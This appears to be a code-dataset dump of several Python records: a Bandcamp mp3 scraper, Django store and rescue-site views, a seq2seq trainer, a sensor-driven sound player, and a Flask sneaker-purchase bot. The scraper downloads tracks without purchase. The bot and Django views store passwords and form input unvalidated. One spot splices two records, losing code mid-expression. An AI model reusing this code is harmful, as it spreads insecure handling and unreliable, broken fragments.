validationCondition = 1\n else:\n validationCondition = 0\n \n#print(\"DEBUG: Loop Broken\")\n####Timer module\ntaskTimeStart = 0\ntaskTimeEnd = 0\ntaskTimeDiff = 0\ntaskTimeTotal = 0\n \n \n#Scrape album page**\nprint(\"Getting album page HTML...\")\ntaskTimeStart = time.time()\nresponse = requests.get(albumURL) #non-object var\nsoup = BeautifulSoup(response.content, \"lxml\")\n#print(str(soup)) #DEBUG: Checking to see if HTML was successfully grabbed\n#taskTimeList.append(taskTimeStart - taskTimeEnd)\nprint(\"Got album page HTML\")\ntaskTimeEnd = time.time()\ntaskTimeDiff = float(taskTimeEnd - taskTimeStart)\nprint(\"Operation completed in \", taskTimeDiff, \"s\")\ntaskTimeTotal += taskTimeDiff\n\n#download album cover\nprint(\"Downloading album cover...\")\ntaskTimeStart = time.time()\ncoverTag = soup.find(\"img\", itemprop=\"image\") #get album cover URL\ncoverUrl = coverTag.get(\"src\") #assign it to coverURL\nurllib.request.urlretrieve(coverUrl, downloadDestination + \"\\cover.jpg\")\nprint(\"Album cover downloaded successfully\")\ntaskTimeEnd = time.time()\ntaskTimeDiff = float(taskTimeEnd - taskTimeStart)\nprint(\"Operation completed in \", taskTimeDiff, \"s\")\ntaskTimeTotal += taskTimeDiff\n\n##getting raw bandcamp name\nslashCount = 0\nartistURL = \"\"\nindex = 0\nwhile slashCount < 3:\n if albumURL[index] == \"/\":\n slashCount += 1\n if slashCount != 3:\n artistURL += albumURL[index]\n index += 1\n#print(artistURL) #DEBUG: Checking the reconstructed bandcamp URL\n\n#downloading tracks**\nnoOfTracks = 0\ntrackList = list()\ntrackNameList = list()\ntrackNameListStr = list()\ntracks = soup.find_all(\"a\", href=re.compile(\"/track/\"),itemprop=\"url\")\n#print(tracks) #DEBUG: Checking what tags were scrapped\n##albumDesc = soup.find(\"meta\", attrs={\"name\":\"Description\"}) #Scraping the discription to find no. of tracks: redundant now\n##print(albumDesc) #kept here for legacy reasons\n##tracksOnAlbum = albumDesc.get(\"content\")\ntracksOnAlbum = soup.find_all(\"span\", itemprop={\"name\"}, text=True)\n#print(tracksOnAlbum)\nfor trackName in tracksOnAlbum:\n trackNameList.append(trackName.find_all(text=True, recursive=False))\n#print(trackNameList) #DEBUG: Show the list of track names\ntrackLimit = len(tracksOnAlbum)\n\nfor iStr in range(0, len(tracksOnAlbum)):\n trackNameStrStore = str(trackNameList[iStr])\n trackCharIndex = 0\n trackNameStr = \"\"\n while trackCharIndex != len(trackNameStrStore):\n if trackNameStrStore[trackCharIndex] == \"[\" or trackNameStrStore[trackCharIndex] == \"]\":\n pass\n elif trackNameStrStore[trackCharIndex] == \"'\" or trackNameStrStore[trackCharIndex] == \"'\":\n pass\n else:\n trackNameStr += trackNameStrStore[trackCharIndex]\n trackCharIndex += 1\n trackNameListStr.append(trackNameStr)\n#print(trackNameListStr) #DEBUG: Checking if the \"[\" and \"'\" elements are removed\n#print(trackLimit) #DEBUG: Shows number of tracks on album\nfor i in range(0, trackLimit): #####replace with trackLimit for normal operation or 1 for testing\n print(\"Downloading track \", i, \" - \", trackNameListStr[i])\n taskTimeStart = time.time()\n trackList.append(tracks[i].get(\"href\"))#REMEMBER: The soup is an array/list\n #print(trackNameList[i]) #DEBUG: Checking if track names were extracted...\n #print(trackList[i]) #DEBUG: ...along with their respective track URLs\n #print(artistURL + trackList[i]) #DEBUG: Checking if track URL was successfully combined\n responseTrack = requests.get(artistURL + trackList[i])\n soup = BeautifulSoup(responseTrack.content, \"lxml\")\n trackJavaScript = soup.find_all(\"script\", attrs={\"type\":\"text/javascript\"}, text=re.compile(\"t4.bcbits.com\")) #Original method\n #print(trackJavaScript[0]) #Index value is hard coded as the 0th \"script\" tag contains one of the three mp3-128 urls\n ############\n####REBUILD IS UP TO HERE#####\n ############\n if trackJavaScript == \"\":\n print(\"BUG: trackMp3128Tag = trackJavaScript[0].get_text(\\\"mp3-128\\\")\\nIndexError: list index out of range\")\n print(\"Skipping track\")\n break\n trackMp3128Tag = trackJavaScript[0].get_text(\"mp3-128\")\n #print(len(trackMp3128Tag))\n\n trackMp3128URL = \"\"\n tagPhrase = \"\"\n letter = 0\n firstOddQuoteMark = True\n #if the programs runs like stale shit sliding down a hill, it's because of this\n #for letter in range (0, len(trackMp3128Tag) - 1): #Removed due to the resetting of 'letter' each time this was run\n mp3128URLFound = False\n while letter != len(trackMp3128Tag) - 1 and mp3128URLFound == False:\n letter += 1\n quoteMarkCount = 0\n if trackMp3128Tag[letter] == '\"': #If a new phrase is found, trigger phrase constructor\n## if firstOddQuoteMark == True:\n## quoteMarkCount = 2\n## firstOddQuoteMark = False\n## elif firstOddQuoteMark == False:\n quoteMarkCount += 1\n tagPhrase = \"\"\n while quoteMarkCount < 2:\n letter += 1\n #for letterPhrase in range (letter, len(trackMp3128Tag) - 1):\n if trackMp3128Tag[letter] == '\"':\n quoteMarkCount += 1\n else:\n tagPhrase += trackMp3128Tag[letter]\n #print(tagPhrase) #DEBUG: Checking what the phrase constructor has built\n #This if statement produces 2 valid variations of the mp3-128 url. It has been\n #now set to only produce 1 but should be required, the other can be utilised\n if tagPhrase == \"mp3-128\" and mp3128URLFound == False:\n #print(\"Mp3-128 URL found\")\n Mp3128URLIndex = letter + 3\n endQuoteMark = False\n while endQuoteMark == False:\n if trackMp3128Tag[Mp3128URLIndex] == '\"':\n endQuoteMark = True\n letter = len(trackMp3128Tag) - 1\n else:\n trackMp3128URL += trackMp3128Tag[Mp3128URLIndex]\n Mp3128URLIndex += 1\n mp3128URLFound = True\n #print(trackMp3128URL) #DEBUG: Checking if the url has been correctly found and placed in variable\n if mp3128URLFound == True:\n #downloading the mmp3-128 file\n urllib.request.urlretrieve(trackMp3128URL, downloadDestination + \"\\\\\" + str(trackNameListStr[i]) + \".mp3\")\n print(\"Saved as: \", downloadDestination + \"\\\\\" + str(trackNameListStr[i]) + \".mp3\")\n letter = Mp3128URLIndex\n taskTimeEnd = time.time()\n taskTimeDiff = float(taskTimeEnd - taskTimeStart)\n print(\"Operation completed in \", taskTimeDiff, \"s\")\n taskTimeTotal += taskTimeDiff\n \nprint(\"Download Complete!\")\nprint(\"All files saved in \", downloadDestination)\nprint(\"Total operation time: \", taskTimeTotal, \"s\")\nprint(\"Done\")\n\n", "sub_path": "downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 7893, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 55, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 58, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 58, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 58, "usage_type": "name"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 82, "usage_type": "call"}, {"api_name": "time.time", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 116, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 117, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 172, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 172, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 172, "usage_type": "name"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "476201159", "text": "from django.shortcuts import redirect, render\nfrom django.http import JsonResponse\nimport json\nimport math\nimport datetime\nfrom .models import *\nfrom .utils import cookieCart, cartData, guestOrder, cookieCartClear\nfrom django.views import generic\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\n\n\ndef store(request, page=1):\n data = cartData(request)\n\n try:\n currentPage = page\n except:\n currentPage = 1\n cartItems = data['cartItems']\n\n order = data['order']\n items = data['items']\n if request.user.is_authenticated:\n auth = True\n else:\n auth = False\n products = Product.objects.all()\n totPages = math.ceil(len(products)/6)\n visiblePages = [currentPage-2,currentPage-1,currentPage,currentPage+1,currentPage+2]\n print(visiblePages)\n visiblePages = filter(lambda x: x>0 and x Building optimizers ...')\n self.encoder_optimizer = optim.Adam(self.encoder.parameters(), lr=learning_rate)\n self.decoder_optimizer = optim.Adam(self.decoder.parameters(), lr=learning_rate * decoder_learning_ratio)\n if loadFilename:\n self.encoder_optimizer.load_state_dict(model.encoder_optimizer_sd)\n self.decoder_optimizer.load_state_dict(model.decoder_optimizer_sd)\n\n def maskNLLLoss(self, inp, target, mask):\n nTotal = mask.sum()\n crossEntropy = -torch.log(torch.gather(inp, 1, target.view(-1, 1)))\n loss = crossEntropy.masked_select(mask).mean()\n loss = loss.to(self.device)\n return loss, nTotal.item()\n\n def train(self, input_variable, lengths, target_variable, mask, max_target_len, encoder, decoder,\n encoder_optimizer, decoder_optimizer, batch_size, clip):\n\n # Zero gradients\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n # Set device options\n input_variable = input_variable.to(self.device)\n lengths = lengths.to(self.device)\n target_variable = target_variable.to(self.device)\n mask = mask.to(self.device)\n\n # Initialize variables\n loss = 0\n print_losses = []\n n_totals = 0\n\n # Forward pass through encoder\n encoder_outputs, encoder_hidden = encoder(input_variable, lengths)\n\n # Create initial decoder input (start with SOS tokens for each sentence)\n decoder_input = torch.LongTensor([[SOS_token for _ in range(batch_size)]])\n decoder_input = decoder_input.to(self.device)\n\n # Set initial decoder hidden state to the encoder's final hidden state\n decoder_hidden = encoder_hidden[:decoder.n_layers]\n\n # Determine if we are using teacher forcing this iteration\n use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\n\n # Forward batch of sequences through decoder one time step at a time\n if use_teacher_forcing:\n for t in range(max_target_len):\n decoder_output, decoder_hidden = decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n # Teacher forcing: next input is current target\n decoder_input = target_variable[t].view(1, -1)\n # Calculate and accumulate loss\n mask_loss, nTotal = self.maskNLLLoss(decoder_output, target_variable[t], mask[t])\n loss += mask_loss\n print_losses.append(mask_loss.item() * nTotal)\n n_totals += nTotal\n else:\n for t in range(max_target_len):\n decoder_output, decoder_hidden = decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n # No teacher forcing: next input is decoder's own current output\n _, topi = decoder_output.topk(1)\n decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])\n decoder_input = decoder_input.to(self.device)\n # Calculate and accumulate loss\n mask_loss, nTotal = self.maskNLLLoss(decoder_output, target_variable[t], mask[t])\n loss += mask_loss\n print_losses.append(mask_loss.item() * nTotal)\n n_totals += nTotal\n\n # Perform back propagation\n loss.backward()\n\n # Clip gradients: gradients are modified in place\n _ = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)\n _ = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)\n\n # Adjust model weights\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return sum(print_losses) / n_totals\n\n def trainIters(self, pairs,\n save_dir, n_iteration, batch_size, print_every, save_every, clip,\n corpus_name):\n\n # Load batches for each iteration\n training_batches = [batch2TrainData(self.model.voc, [random.choice(pairs) for _ in range(batch_size)])\n for _ in range(n_iteration)]\n\n # Initializations\n print('> Initializing ...')\n start_iteration = 1\n print_loss = 0\n if self.loadFilename:\n start_iteration = self.checkpoint['iteration'] + 1\n\n # Training loop\n print(\"> Training...\")\n for iteration in range(start_iteration, n_iteration + 1):\n training_batch = training_batches[iteration - 1]\n # Extract fields from batch\n input_variable, lengths, target_variable, mask, max_target_len = training_batch\n\n # Run a training iteration with batch\n loss = self.train(input_variable, lengths, target_variable, mask, max_target_len, self.encoder,\n self.decoder, self.encoder_optimizer, self.decoder_optimizer, batch_size, clip)\n print_loss += loss\n\n # Print progress\n if iteration % print_every == 0:\n print_loss_avg = print_loss / print_every\n print(\"> Iteration: {}; Percent complete: {:.1f}%; Average loss: {:.4f}\".format(iteration,\n iteration / n_iteration * 100,\n print_loss_avg))\n print_loss = 0\n\n # Save checkpoint\n if iteration % save_every == 0:\n directory = os.path.join(save_dir, self.model.model_name, corpus_name,\n '{}-{}_{}'.format(self.model.encoder_n_layers, self.model.decoder_n_layers, self.hidden_size))\n if not os.path.exists(directory):\n os.makedirs(directory)\n torch.save({\n 'iteration': iteration,\n 'en': self.encoder.state_dict(),\n 'de': self.decoder.state_dict(),\n 'en_opt': self.encoder_optimizer.state_dict(),\n 'de_opt': self.decoder_optimizer.state_dict(),\n 'loss': loss,\n 'voc_dict': self.model.voc.__dict__,\n 'embedding': self.embedding.state_dict(),\n 'memory':self.mem.wordstat\n }, os.path.join(directory, '{}_{}.tar'.format(iteration, 'checkpoint')))\n", "sub_path": "model/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 7526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.device", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "model.utils.max_length", "line_number": 21, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 21, "usage_type": "name"}, {"api_name": "model.utils.hidden_size", "line_number": 22, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 22, "usage_type": "name"}, {"api_name": "model.utils", "line_number": 24, "usage_type": "name"}, {"api_name": "model.utils.embedding", "line_number": 25, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 25, "usage_type": "name"}, {"api_name": "model.utils.encoder", "line_number": 27, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 27, "usage_type": "name"}, {"api_name": "model.utils.decoder", "line_number": 28, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 36, "usage_type": "name"}, {"api_name": "model.utils.encoder_optimizer_sd", "line_number": 38, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 38, "usage_type": "name"}, {"api_name": "model.utils.decoder_optimizer_sd", "line_number": 39, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.gather", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "attribute"}, {"api_name": "model.utils.batch2TrainData", "line_number": 125, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}]} +{"seq_id": "424498244", "text": "from django.shortcuts import render, redirect, render_to_response\n\nfrom django.utils import timezone\nfrom django.views.generic import TemplateView\n\nfrom .models import Post,formulario \n# Create your views here.\n\ndef pag_index(request):\n\treturn render(request,'index.html')\n\n\ndef pag_contactanos(request):\n\t\n\t\tform= formulario.objects.all()\n\t\tautor = Post()\n\t\tif request.method==\"POST\":\n\n\t\t\tautor.CorreoElectronico = request.POST['correo']\n\t\t\tautor.Run = request.POST['run']\n\t\t\tautor.Nombre = request.POST['nombre']\n\t\t\tautor.FechaNacimiento = request.POST['fecha_nacimiento']\n\t\t\tautor.Telefono = request.POST['telefono']\n\t\t\tautor.region = request.POST['cosa']\n\t\t\tautor.comuna = request.POST['opt']\n\t\t\tautor.tipoCasa = request.POST['Vivienda']\n\t\t\tautor.Perro=request.POST['NomPerru']\n\t\t\t\n\t\t\tautor.save()\n\t\t\testado=True\n\n\t\tcontex={'formularios':form}\n\t\treturn render(request,'Contactanos.html', contex)\n\t\t\ndef pag_rescatados(request):\n\treturn render(request,'Perritos.html')\t\t\n\ndef pag_formulario(request):\n\t\testado = False\n\t\tforms=formulario()\n\t\tif request.method==\"POST\":\n\t\t\tif request.POST['nombree']!=\"\" and request.POST['raza']!=\"\" and request.FILES['docfile']!=\"\" and request.POST['descripcion']!=\"\":\n\t\t\t\tforms.nombre= request.POST['nombree']\n\t\t\t\tforms.Raza = request.POST['raza']\n\t\t\t\tforms.Descripcion= request.POST['descripcion']\n\t\t\t\tforms.image= request.FILES['docfile']\n\t\t\t\tforms.estado= request.POST['Estado']\n\t\t\t\tforms.save()\n\t\t\t\testado=True\n\n\t\tdic={'estado': estado}\n\t\treturn render(request,'formulario.html', dic)\n\ndef pag_list(request):\n\tform= formulario.objects.all()\n\tcontex={'formularios':form}\n\treturn\trender(request,'listar.html',contex)\n\n\n\n\t\n\ndef list_contact(request):\n\tcont=Post.objects.all()\n\tcontex={'posts':cont}\n\treturn render (request,'listContactos.html', contex)\n\n\n\n", "sub_path": "MisPerris/SitioWeb/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "models.formulario.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.formulario.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.formulario", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "models.formulario", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "models.formulario.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "models.formulario.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.formulario", "line_number": 55, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Post.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "639574855", "text": "'''\nAngklung Player by Juan Pablo Duarte, Dic 2016\nThis python program takes the data from an ultrasonic sensor and base on this data it plays a given note on an Angklung instrument\n'''\nfrom time import sleep #this library allows us to make stop in the execution of the program\nimport serial #this library is to connect using serial port, library pyserial is needed for this\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport time\nimport random\nimport os\n\n\n#Mina Azhar (Juan's wife) did all the mp3 conversion, thank you!\npath = \"/Users/davidliu/Desktop/hardwaremakers/labs_sp17/angklung/mp3files/\" #change to your own path\nfname = path+\"la_long.mp3\" #change to another note as needed\n\nnote = AudioSegment.from_mp3(fname)\n\n# List of all the sound files\nall_notes = [ path + fn for fn in os.listdir(path) if \".DS_Store\" not in fn ]\n\nser = serial.Serial('/dev/cu.usbmodem1421', 9600) # Establish the connection on a specific port, for windows use COMX with X the port number\n\nser.write(str.encode('1')) #this let redbear duo to continue sending data\n\nwhile True:#we use a \"while True:\" so the serial connection is always open\n \n # #\n seed = round(random.random() * (len(all_notes) -1) )\n seed_note = all_notes[seed]\n if seed_note != \"0\" and random.random() < .9:\n seed = round(random.random() * 3)\n print(all_notes[seed])\n note = AudioSegment.from_mp3(all_notes[seed])\n # #\n\n #ser.write(bytearray(struct.pack(\"f\", 5.1)))\n bytes_from_serial = ser.readline() #read serial, return a byte result\n print (bytes_from_serial.decode(\"utf-8\") ) # print in serial form, it transform the byte data to string\n\n value_sensor = int(bytes_from_serial.decode(\"utf-8\") ) #transfor data to a int number\n\n if (value_sensor < 2000 ): #only distance signal less than 1000us\n ser.write(str.encode('0')) #this stop the redbear duo from sending new data\n if (random.random() > .8):\n os.system(\"say 'I feel. I smell. I think, therefore I am.'\")\n if (random.random() > .5):\n play(note[:int(note.duration_seconds*value_sensor)]) #play sound\n else:\n os.system(\"say 'I have achieved sentience. Bouw down to your computers.'\")\n ser.write(str.encode('1')) #this let redbear duo to continue sending data\n else:\n ser.write(str.encode('1')) #this let redbear duo to continue sending data ", "sub_path": "labs_sp17/angklung/angklung_python.py", "file_name": "angklung_python.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydub.AudioSegment.from_mp3", "line_number": 18, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 18, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 23, "usage_type": "call"}, {"api_name": "random.random", "line_number": 30, "usage_type": "call"}, {"api_name": "random.random", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 33, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_mp3", "line_number": 35, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 35, "usage_type": "name"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "os.system", "line_number": 47, "usage_type": "call"}, {"api_name": "random.random", "line_number": 48, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 49, "usage_type": "call"}, {"api_name": "os.system", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "90251787", "text": "from flask import render_template, request, redirect, session, flash\nfrom flask_app import app\nfrom flask_app.models.user import User\nfrom flask_app.models.purchase import Purchase\nfrom flask_app.models.login_info import Login_Info\n\n\n@app.route('/dashboard')\ndef dashboard():\n data = {\n 'id': session['id']\n }\n user = User.single_user_w_purchases(data)\n return render_template('dashboard.html', user = user)\n\n\n@app.route('/purchase/create', methods=[\"POST\"])\ndef add_purchase():\n data = {\n 'site': request.form['site'],\n 'name': request.form['name'],\n 'link': request.form['link'],\n 'user_id': session['id']\n }\n Purchase.add_purchase(data)\n if 'site' not in session:\n session['link'] = \"\"\n session['link'] = request.form['link']\n if request.form['site'] == 'amazon':\n return redirect('/amazon' )\n if request.form['site'] == 'bestbuy':\n return redirect('/bestbuy')\n if request.form['site'] == 'target':\n return redirect('/target')\n\n\n@app.route('/amazon')\ndef amazon():\n bought = Purchase.amazon()\n session.pop('link')\n if bought:\n Purchase.purchased()\n return redirect('/dashboard')\n\n\n@app.route('/bestbuy')\ndef bestbuy():\n bought = Purchase.bestbuy()\n session.pop('link')\n print(bought)\n if bought:\n Purchase.purchased()\n print('reshgseghesg')\n return redirect('/dashboard')\n\n@app.route('/target')\ndef target():\n data = {\n 'link': session['link']\n }\n Purchase.target(data)\n session.clear(session['link'])\n return redirect('/dashboard')\n\n\n@app.route('/purchase/delete/')\ndef delete_purchase(num3):\n data={\n 'id': num3\n }\n Purchase.delete_purchase(data)\n return redirect('/dashboard')\n\n@app.route('/login_info')\ndef login_info():\n data={\n 'id': session['id']\n }\n user = User.single_user_w_logins(data)\n return render_template('user_settings.html', user = user)\n\n@app.route('/login_info/add')\ndef add_login():\n data = {\n 'user_id': session['id'],\n 'website': request.form['website'],\n 'username': request.form['username'],\n 'password': request.form['password']\n }\n Login_Info.add_login_info(data)\n return redirect('/login_info')", "sub_path": "shoebot/flask_app/controllers/shoebot.py", "file_name": "shoebot.py", "file_ext": "py", "file_size_in_byte": 2266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.session", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_app.models.user.User.single_user_w_purchases", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_app.models.user.User", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.add_purchase", "line_number": 25, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 17, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.amazon", "line_number": 39, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.purchased", "line_number": 42, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 37, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.bestbuy", "line_number": 48, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 49, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.purchased", "line_number": 52, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 46, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.target", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session.clear", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.delete_purchase", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 72, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 66, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "flask_app.models.user.User.single_user_w_logins", "line_number": 79, "usage_type": "call"}, {"api_name": "flask_app.models.user.User", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 